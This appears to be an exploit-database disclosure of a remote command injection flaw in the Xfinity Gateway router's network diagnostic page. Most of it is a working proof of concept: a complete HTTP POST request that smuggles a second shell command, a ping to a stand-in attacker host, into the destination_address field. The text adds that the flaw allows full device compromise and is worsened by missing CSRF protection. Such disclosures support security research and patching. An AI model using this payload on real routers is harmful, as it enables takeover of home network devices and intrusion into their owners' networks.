32 lines
No EOL
1.4 KiB
Text
32 lines
No EOL
1.4 KiB
Text
# Exploit Title: Xfinity Gateway: Remote Code Execution
|
|
# Date: 12/2/2016
|
|
# Exploit Author: Gregory Smiley
|
|
# Contact: gsx0r.sec@gmail.com
|
|
# Vendor Homepage: http://xfinity.com
|
|
# Platform: php
|
|
|
|
The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection.
|
|
|
|
PoC:
|
|
|
|
POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
|
|
Host: 10.0.0.1
|
|
User-Agent:
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
X-Requested-With: XMLHttpRequest
|
|
Referer: http://10.0.0.1/network_diagnostic_tools.php
|
|
Content-Length: 91
|
|
Cookie: PHPSESSID=; auth=
|
|
DNT: 1
|
|
X-Forwarded-For: 8.8.8.8
|
|
Connection: keep-alive
|
|
|
|
test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4
|
|
|
|
|
|
If you open up wireshark and set ip.dst==attackerip and icmp you will see that the router issues 3 icmp echo requests, proving successful command injection. This can be leveraged to completely compromise the device.
|
|
|
|
This vulnerability is also particularly dangerous because there is no CSRF protections in this application as demonstrated here https://www.exploit-db.com/exploits/40853/ |